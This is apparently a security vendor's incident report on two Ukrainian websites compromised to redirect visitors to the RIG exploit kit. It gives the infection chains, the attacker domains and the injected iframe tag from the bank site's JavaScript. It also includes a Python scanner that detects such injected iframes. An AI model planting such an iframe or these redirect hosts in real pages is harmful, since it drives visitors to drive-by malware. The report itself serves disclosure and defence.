The Ukrainian website unicredit.ua is the 704th most popular website in Ukraine, according to Alexa. This exploit does not trigger every time the site is loaded, so there must be some logic that controls the schedule of when the malware redirection occurs.


Here is the full infection chain:

 1. start:      www.unicredit.ua
 2. redirector: oggy.co
 3. payload:    cancel.bananacake.info/<malware>


The website redirects to a Flash exploit for CVE-2015-5122 hosted at bananacake.info. It is part of the RIG exploit kit. The JavaScript code of this kit can detect the presence of some antivirus software on the system; see the code listing below.

In this case malvertising was not involved; instead the site itself was compromised. Specifically, the following iframe was injected into https://www.unicredit.ua/script/cutthroughbanner.js:

    <iframe src="http://oggy.co/wkap.php" width="101" height="102"></iframe>
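As an added defensive check (not Cyphort's code), the script below scans a fetched first-party JavaScript file for iframes that point at hosts outside the site's own domain or that are styled to be invisible, which is how the injection above would show up in a periodic integrity scan. The sample script is constructed; only oggy.co and unicredit.ua come from the incident described here.

```python
import re
from urllib.parse import urlparse

# Constructed sample (hypothetical, not the real cutthroughbanner.js): one
# legitimate first-party iframe, one injected third-party iframe modelled on
# the oggy.co tag quoted above, and one first-party iframe hidden via CSS.
SAMPLE_JS = """
var b = document.getElementById('banner');
b.innerHTML = '<iframe src="https://www.unicredit.ua/promo.html" width="300" height="250"></iframe>';
b.innerHTML += '<iframe src="http://oggy.co/wkap.php" width="101" height="102"></iframe>';
b.innerHTML += '<iframe src="https://cdn.unicredit.ua/x.html" style="display:none"></iframe>';
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")


def iframe_attrs(js_text):
    """Return one {attribute: value} dict per <iframe ...> tag found in the text."""
    return [dict(ATTR_RE.findall(m.group(1))) for m in IFRAME_RE.finditer(js_text)]


def _host_allowed(host, allowed_hosts):
    # Accept the domain itself and any of its subdomains.
    return any(host == h or host.endswith("." + h) for h in allowed_hosts)


def scan_script(js_text, allowed_hosts):
    """Return (src, reason) pairs for iframes loading third-party content or
    styled/sized to be invisible; either is unusual in a banner script."""
    findings = []
    for attrs in iframe_attrs(js_text):
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        style = attrs.get("style", "").replace(" ", "").lower()
        try:
            w, h = int(attrs.get("width", -1)), int(attrs.get("height", -1))
        except ValueError:
            w, h = -1, -1
        if host and not _host_allowed(host, allowed_hosts):
            findings.append((src, "third-party iframe host: " + host))
        elif "display:none" in style or "visibility:hidden" in style or (0 <= w <= 1 and 0 <= h <= 1):
            findings.append((src, "hidden iframe"))
    return findings


if __name__ == "__main__":
    for src, why in scan_script(SAMPLE_JS, ["unicredit.ua"]):
        print(why, "->", src)
```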

We reached out to UniCredit to notify them of this attack, but have not heard back so far.

Interestingly, this is not the only attack on a prominent Ukrainian website this week. We have seen the same attack, likely by the same group, on another high-profile Ukrainian news site, rbc.ua, two days ago on Jul 13 at 09:31 UTC.

RBC stands for RosBusinessConsulting, a large media group listed on the Russian stock exchange as RBCM. It has more than 1,500 employees and revenue of $81 million. Here is the RBC.ua infection chain:

 1. start:   www.rbc.ua
 2. payload: add.gainesville-hypnosis.com/?<malware>

The RIG exploit kit was also used in the RBC.ua compromise. RIG is a popular exploit kit which has been around for about a year and is sold on various "underground" forums. See the screenshot below (from http://www.malwaretech.com/).

Cyphort Labs is monitoring this campaign and analyzing the payload executable and will share more results as soon as they become available.